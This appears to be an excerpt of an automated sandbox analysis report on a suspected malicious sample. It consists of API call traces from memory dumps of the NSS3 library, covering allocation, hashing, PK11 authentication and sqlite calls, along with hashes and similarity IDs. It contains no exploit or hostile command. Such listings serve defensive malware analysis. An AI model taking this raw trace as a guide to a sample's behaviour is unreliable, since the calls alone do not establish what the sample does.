                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CB29C5B), ref: 6CB29DFE
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CB29C5B), ref: 6CB29E43
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CB29C5B), ref: 6CB29E91
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                                • Part of subcall function 6CB21560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CB1FAAB,00000000), ref: 6CB2157E
                                                                                                                                                                                                                • Part of subcall function 6CB21560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CB1FAAB,00000000), ref: 6CB21592
                                                                                                                                                                                                                • Part of subcall function 6CB21560: memset.VCRUNTIME140(?,00000000,?), ref: 6CB21600
                                                                                                                                                                                                                • Part of subcall function 6CB21560: PL_ArenaRelease.NSS3(?,?), ref: 6CB21620
                                                                                                                                                                                                                • Part of subcall function 6CB21560: PR_Unlock.NSS3(?), ref: 6CB21639
Memory Dump Source
• Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
• Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3425318038-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CAEDDEC
                                                                                                                                                                                                                • Part of subcall function 6CB20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB208B4
                                                                                                                                                                                                              • PK11_DigestBegin.NSS3(00000000), ref: 6CAEDE70
                                                                                                                                                                                                              • PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CAEDE83
                                                                                                                                                                                                              • HASH_ResultLenByOidTag.NSS3(?), ref: 6CAEDE95
                                                                                                                                                                                                              • PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CAEDEAE
                                                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CAEDEBB
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAEDECC
Memory Dump Source
• Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
• Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1091488953-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CB1D9E4,00000000), ref: 6CB1DC30
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CB1D9E4,00000000), ref: 6CB1DC4E
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CB1D9E4,00000000), ref: 6CB1DC5A
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB1DC7E
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB1DCAD
Memory Dump Source
• Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
• Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$Arenamemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?,6CB2CD93,?), ref: 6CB2CEEE
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CB2CD93,?), ref: 6CB2CEFC
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CB2CD93,?), ref: 6CB2CF0B
                                                                                                                                                                                                                • Part of subcall function 6CB20840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB208B4
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CB2CD93,?), ref: 6CB2CF1D
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB18D2D,?,00000000,?), ref: 6CB1FB85
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB1FBB1
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF47
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF67
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,6CB2CD93,?,?,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CAD8C1B
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6CAD8C34
                                                                                                                                                                                                              • PL_ArenaAllocate.NSS3 ref: 6CAD8C65
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD8C9C
                                                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CAD8CB6
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: TlsGetValue.KERNEL32 ref: 6CB6DD8C
                                                                                                                                                                                                                • Part of subcall function 6CB6DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB6DDB4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                                              • String ID: KRAM
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6CBD2CA0
                                                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6CBD2CBE
                                                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6CBD2CD1
                                                                                                                                                                                                              • strdup.MOZGLUE(?), ref: 6CBD2CE1
                                                                                                                                                                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CBD2D27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • Loaded library %s (static lib), xrefs: 6CBD2D22
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                                              • String ID: Loaded library %s (static lib)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6CACBDCA
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAC87ED,00000800,6CABEF74,00000000), ref: 6CB21000
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PR_NewLock.NSS3(?,00000800,6CABEF74,00000000), ref: 6CB21016
                                                                                                                                                                                                                • Part of subcall function 6CB20FF0: PL_InitArenaPool.NSS3(00000000,security,6CAC87ED,00000008,?,00000800,6CABEF74,00000000), ref: 6CB2102B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CACBDDB
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CACBDEC
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2116E
                                                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(00000000,00000000,?), ref: 6CACBE03
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CB18D2D,?,00000000,?), ref: 6CB1FB85
                                                                                                                                                                                                                • Part of subcall function 6CB1FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CB1FBB1
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CACBE22
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CACBE30
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CACBE3B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Alloc_$AllocateArena_ErrorValue$CopyCriticalEnterFreeInitItem_LockPoolSectionUnlockcallocmemcpy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1821307800-0
                                                                                                                                                                                                              • Opcode ID: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                              • Instruction ID: da591a97a491875dcdf2c0d84be2de0638a7eaa7e81dbe0d2cd6651fe842421c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 49bd7be85a6d6651bfacdc823afd404720f93631e91d5564c55d0a1637df6a24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF012B75B4024166F71022A6BC01FAF765C8F5078DF180231FE0C96BC2FB56D51882B7
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                                                                                                                              • String ID: throw(
                                                                                                                                                                                                              • API String ID: 168861036-3159766648
                                                                                                                                                                                                              • Opcode ID: 2bf6caf8aa05833f26c054bc8bfc4c855887e1ab864b81c46916b1f724f2084e
                                                                                                                                                                                                              • Instruction ID: ebe6692590a1d9e8138d0d0b1413cd845633ed29aa843b915f3fcc229b2a05cc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bf6caf8aa05833f26c054bc8bfc4c855887e1ab864b81c46916b1f724f2084e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94014031A4020DAFCF04EBA4D866EEE7BB9EF85748F404065F905AB291DA74DA458B84
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB51C74
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6CB51C92
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB51C99
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?), ref: 6CB51CCB
                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6CB51CD2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalDeleteSectionfree$ErrorValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3805613680-0
                                                                                                                                                                                                              • Opcode ID: ab612280c55077ad7086cd206a069c185be16eac812c973aaaf13c65e4610d99
                                                                                                                                                                                                              • Instruction ID: 95487262a0183ddc8691aa793b5fd5d2f4682e7186f387eb6ea76b802375c379
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab612280c55077ad7086cd206a069c185be16eac812c973aaaf13c65e4610d99
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 670196B1F212A09FDE31EFA5DC0D74937B8B706328F540125E909A6E40D72A91648792
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,6CAB3D77,?,?,6CAB4E1D), ref: 6CBB1C8A
                                                                                                                                                                                                              • sqlite3_free.NSS3(00000000), ref: 6CBB1CB6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: sqlite3_freesqlite3_mprintf
                                                                                                                                                                                                              • String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s
                                                                                                                                                                                                              • API String ID: 1840970956-3705377941
                                                                                                                                                                                                              • Opcode ID: d9e637dcbf9ac90a9570404c4126e2cfefc87f9a1bd8c99a7d6f4ae912367eac
                                                                                                                                                                                                              • Instruction ID: 11a862b445f6432a300a9f220fa2d04c43984d835c7847f00f538e004a01455d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9e637dcbf9ac90a9570404c4126e2cfefc87f9a1bd8c99a7d6f4ae912367eac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B70124B5A001804BDB04AA68D81297177E5EF8234CB14486DE9489BB02EB32E89BC751
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000000), ref: 6CB2ED6B
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6CB2EDCE
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,6CB2B04F), ref: 6CB2EE46
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB2EECA
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CB2EEEA
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6CB2EEFB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_Util$Arena$Valuefreemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3768380896-0
                                                                                                                                                                                                              • Opcode ID: 6550e8274baa4e92a385031effcd9837f3f6cf934e213440a7d12ba35be10bfc
                                                                                                                                                                                                              • Instruction ID: 94c37d2755e3caa34f3f592fb5ff07e3c98364311642c70fa9c74f9f4626fdf3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6550e8274baa4e92a385031effcd9837f3f6cf934e213440a7d12ba35be10bfc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5816C71A002859FEB14DF66D884BBFB7B5FF48349F144428E8299B751D738E814CBA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6CB2C6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CB2DAE2,?), ref: 6CB2C6C2
                                                                                                                                                                                                              • PR_Now.NSS3 ref: 6CB2CD35
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DC6
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBD0A27), ref: 6CB89DD1
                                                                                                                                                                                                                • Part of subcall function 6CB89DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB89DED
                                                                                                                                                                                                                • Part of subcall function 6CB16C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C3F
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CB2CD54
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                                • Part of subcall function 6CB17260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAC1CCC,00000000,00000000,?,?), ref: 6CB1729F
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CB2CD9B
                                                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CB2CE0B
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CB2CE2C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CB2CE40
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaMark_Util.NSS3(?,6CB2CD93,?), ref: 6CB2CEEE
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CB2CD93,?), ref: 6CB2CEFC
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CB2CD93,?), ref: 6CB2CF0B
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CB2CD93,?), ref: 6CB2CF1D
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF47
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF67
                                                                                                                                                                                                                • Part of subcall function 6CB2CEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CB2CD93,?,?,?,?,?,?,?,?,?,?,?,6CB2CD93,?), ref: 6CB2CF78
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3748922049-0
                                                                                                                                                                                                              • Opcode ID: 9a7a7340194a38b8e22cdf16929a485af572a6942a11f1fa4c41b46301fca365
                                                                                                                                                                                                              • Instruction ID: ae3eed12690337f69a5ff783f87cc1bd241d1e506ee88014adff91f80e2679d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a7a7340194a38b8e22cdf16929a485af572a6942a11f1fa4c41b46301fca365
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44519FB6A012509BFB10EF69DC40BBA73E4EF48348F250524D95DA7B41EB39F905CB92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CAFEF38
                                                                                                                                                                                                                • Part of subcall function 6CAE9520: PK11_IsLoggedIn.NSS3(00000000,?,6CB1379E,?,00000001,?), ref: 6CAE9542
                                                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CAFEF53
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: TlsGetValue.KERNEL32 ref: 6CB04C4C
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: EnterCriticalSection.KERNEL32(?), ref: 6CB04C60
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CA1
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CB04CBE
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04CD2
                                                                                                                                                                                                                • Part of subcall function 6CB04C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CB04D3A
                                                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CAFEF9E
                                                                                                                                                                                                                • Part of subcall function 6CB89BF0: TlsGetValue.KERNEL32(?,?,?,6CBD0A75), ref: 6CB89C07
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAFEFC3
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CAFF016
                                                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CAFF022
